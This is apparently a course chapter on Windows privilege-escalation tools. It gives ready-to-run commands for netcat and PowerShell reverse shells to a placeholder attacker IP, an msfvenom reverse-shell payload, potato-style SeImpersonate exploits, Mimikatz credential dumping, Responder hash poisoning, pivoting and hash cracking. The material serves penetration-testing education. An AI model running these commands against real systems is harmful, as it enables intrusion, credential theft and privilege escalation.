16 - Useful Tools

Topics

1. Introduction to the Windows Shells

2. Windows Permissions

3. Reverse Shells in Windows

4. SeImpersonatePrivilege Exploitation

5. On Cross Compilation

6. Windows Services

7. Weak Service Permissions

8. Unquoted Service Path

9. DLL Hijacking

10. Always Install Elevated

11. Files with Sensitive Data

12. Windows Hashes

13. Stored Credentials and the Windows Vault

14. Scheduled Task

15. Critical Registry Paths

16. Useful Tools

17. AMSI Bypass

Why Do We Use Tools?

In the field of cybersecurity, tools play a crucial role in automating repetitive, complex, or otherwise resource-intensive tasks. They help professionals save time and effort, which are often limited during assessments or incidents. A good tool should:

1. Clearly define its purpose and scope.

2. Be simple to use relative to its functionality.

3. Integrate seamlessly into automation workflows.

4. Provide concise and clear output.

5. Remain minimalistic, avoiding unnecessary features.

6. Be well-documented and, if possible, modifiable for specific needs.

Why Mindset Matters

While tools are powerful, understanding the underlying concepts they automate remains essential. This knowledge ensures that you can:

• Customize tools to your needs.

• Develop solutions in environments where tools are unavailable.

• Mitigate tool-related detection by defenders during offensive operations.

The best tool is always a well-trained mind.

---

Useful Tools (Windows)

Certutil

Built-in Windows utility often used for certificate management. It can also download files:

certutil -urlcache -split -f <URL> <OUTPUT-FILE>
certutil -urlcache -split -f https://example.com/file.txt file.txt

---

Invoke-WebRequest (iwr)

PowerShell cmdlet to download files:

iwr -uri <URL> -OutFile <OUTPUT-FILE>
iwr -uri https://example.com/file.txt -OutFile file.txt

---

Netcat (nc)

A versatile networking tool for creating reverse shells, listening ports, and file transfers. Example for reverse shell:

iwr -uri https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe -Outfile netcat64.exe
nc -lvnp 4321 (listener)
.\netcat64.exe <ATTACKER-IP> 4321 -e cmd.exe (on target)

---

Invoke-PowerShellTcp

A PowerShell reverse shell script:

iwr -uri https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -Outfile Invoke-PowerShellTcp.ps1
. .\Invoke-PowerShellTcp
Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER-IP> -Port <PORT>

---

Msfvenom

Tool for generating payloads. Example for a reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f exe -o malicious.exe

---

MinGW32

A cross-compiler for building Windows binaries from Linux. Example of building a basic program:

#include <stdio.h>
int main() { printf("Hello World!\n"); return 0; }

Compile using:

x86_64-w64-mingw32-gcc -o hello.exe hello.c

---

PrintSpoofer

Exploit for abusing the SeImpersonatePrivilege:

iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -c "cmd.exe"

---

GodPotato

Similar to PrintSpoofer, used for exploiting SeImpersonatePrivilege:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.\GodPotato-NET2.exe -cmd "cmd.exe"

---

WinPEAS

Windows Privilege Escalation Awesome Script:

iwr -uri https://github.com/peass-ng/PEASS-ng/releases/download/20241205-c8c0c3e5/winPEASx64.exe -Outfile winPEASx64.exe
.\winPEASx64.exe quiet

---

PowerUp

PowerShell script for auditing privilege escalation:

iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -Outfile PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-PrivescAudit -HTMLReport

---

PrivescCheck

Identifies misconfigurations leading to privilege escalation:

iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/release/PrivescCheck.ps1" -Outfile PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"

---

BeRoot

Post-exploitation script for privilege escalation checks:

iwr -uri "https://github.com/AlessandroZ/BeRoot/releases/download/1.0.1/beRoot.zip" -Outfile beRoot.zip
.\beRoot.exe

---

Mimikatz

Advanced credential-dumping tool:

iwr -uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -Outfile mimikatz_trunk.zip
.\mimikatz.exe

---

Impacket

Python library for working with Windows protocols:

pip install impacket
impacket-smbclient <TARGET-IP>

---

Responder

Poisoning tool for capturing hashes:

git clone https://github.com/lgandx/Responder
sudo python3 Responder.py -I <INTERFACE>

---

Chisel

TCP/UDP tunneling tool for pivoting:

chisel server -p 8080 --reverse
chisel client <SERVER-IP>:8080 R:1080:127.0.0.1:80

---

Hashcat and John the Ripper

Tools for cracking passwords and hashes:

hashcat -m 1000 -a 0 hash.txt rockyou.txt
john --format=nt --wordlist=rockyou.txt hash.txt

---

CrackMapExec

Network exploitation and post-exploitation framework:

crackmapexec smb <TARGET-IP>

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗